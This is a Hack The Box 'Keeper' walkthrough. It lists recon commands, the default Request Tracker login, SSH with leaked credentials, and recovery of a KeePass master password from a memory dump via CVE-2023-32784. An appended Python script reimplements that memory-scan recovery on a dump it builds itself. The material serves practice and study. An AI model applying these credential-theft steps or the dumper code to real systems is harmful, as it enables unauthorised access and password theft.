Keeper - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.11.227
- Add domain to local DNS
echo "10.10.11.227 tickets.keeper.htb" >> /etc/hosts
Exploitation
- Request Tracker default credentials (the stock RT admin login still works)
root:password
- Leaked credentials
- Connect to ssh with the leaked credentials
ssh 10.10.11.227 -l lnorgaard
Post-exploitation
- Extract the KeePass memory dump and recover the master password (CVE-2023-32784)
scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip .
7z x RT30000.zip
https://github.com/vdohney/keepass-password-dumper
dotnet run ../KeePassDumpFull.dmp  # run from inside the cloned dumper repository; the first character is not recoverable
- Open the kdbx database with the recovered master password
keepassxc ../passcodes.kdbx
- Save the PuTTY-User-Key-File note from the database as pass.ppk and convert it to an OpenSSH private key
puttygen pass.ppk -O private-openssh -o id_rsa
ssh -i id_rsa root@10.10.11.227
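Added example (not part of the original writeup or of the keepass-password-dumper project): a minimal re-implementation of what the dumper does with KeePassDumpFull.dmp. KeePass 2.x's SecureTextBoxEx leaves, for every keystroke after the first, a .NET string of n bullet characters (U+25CF, bytes CF 25 in UTF-16LE) followed by the typed character; scanning the dump for those runs gives the master password minus its first character, with several candidates at positions the user mistyped and corrected. The dump here is constructed in the script to run offline; `build_fake_dump`, `recover_candidates` and `render` are names chosen for this example.

```python
import re
from collections import defaultdict

# '●' (U+25CF) is the masking character KeePass 2.x SecureTextBoxEx uses.
# .NET strings live in memory as UTF-16LE, so each bullet is the byte pair CF 25.
BULLET = "\u25cf"
BULLET_LE = BULLET.encode("utf-16-le")   # b'\xcf\x25'


def leftover_strings(typed: str) -> list:
    """Model of CVE-2023-32784: for the i-th keystroke (i >= 1) KeePass leaves a
    string of i bullets followed by the typed character on the heap. The first
    character never gets a bullet prefix, so it cannot be recovered this way."""
    return [BULLET * i + typed[i] for i in range(1, len(typed))]


def build_fake_dump(typed: str, extra=()) -> bytes:
    """Constructed stand-in for a KeePass process dump: leftover strings scattered
    among filler bytes. `extra` adds leftovers from a mistyped, then corrected,
    character (e.g. BULLET * 3 + "x" means 'x' was once typed at position 3)."""
    filler = b"\x00" * 6 + "KeePass".encode("utf-16-le") + b"\xff\xfe"
    chunks = [filler]
    for s in leftover_strings(typed) + list(extra):
        chunks.append(s.encode("utf-16-le"))
        chunks.append(filler)
    # A bullet run with no printable character behind it: the scanner must skip it.
    chunks.append(BULLET_LE * 4 + b"\x00\x00")
    return b"".join(chunks)


# One or more UTF-16LE bullets, then one UTF-16 code unit (two arbitrary bytes).
_PATTERN = re.compile(rb"(?:\xcf\x25)+(..)", re.DOTALL)


def recover_candidates(dump: bytes) -> dict:
    """Scan a memory dump for bullet runs followed by one character. A run of
    n bullets + char c means c was typed at 0-indexed position n.
    Returns {position: set of candidate characters}; position 0 is never present."""
    candidates = defaultdict(set)
    for m in _PATTERN.finditer(dump):
        n_bullets = (len(m.group(0)) - 2) // 2
        try:
            ch = m.group(1).decode("utf-16-le")
        except UnicodeDecodeError:
            continue  # lone surrogate or other junk, not a typed character
        if not ch.isprintable() or ch == BULLET:
            continue  # NUL padding, or a run the regex had to backtrack into
        candidates[n_bullets].add(ch)
    return dict(candidates)


def render(candidates: dict) -> str:
    """Dumper-style output: '?' for the unrecoverable first character,
    {a|b} where more than one character was seen at a position."""
    if not candidates:
        return ""
    out = ["?"]
    for pos in range(1, max(candidates) + 1):
        chars = sorted(candidates.get(pos, set()))
        if len(chars) == 1:
            out.append(chars[0])
        elif chars:
            out.append("{" + "|".join(chars) + "}")
        else:
            out.append("?")
    return "".join(out)


if __name__ == "__main__":
    # Constructed input: "password" typed, with an 's' first mistyped as 'x' at position 3.
    dump = build_fake_dump("password", extra=[BULLET * 3 + "x"])
    print(render(recover_candidates(dump)))
```

On a real dump the same scan is noisier (other masked text boxes leave the same pattern), which is why the dumper prints alternatives per position instead of a single string; the first character still has to be guessed, as it does on this box.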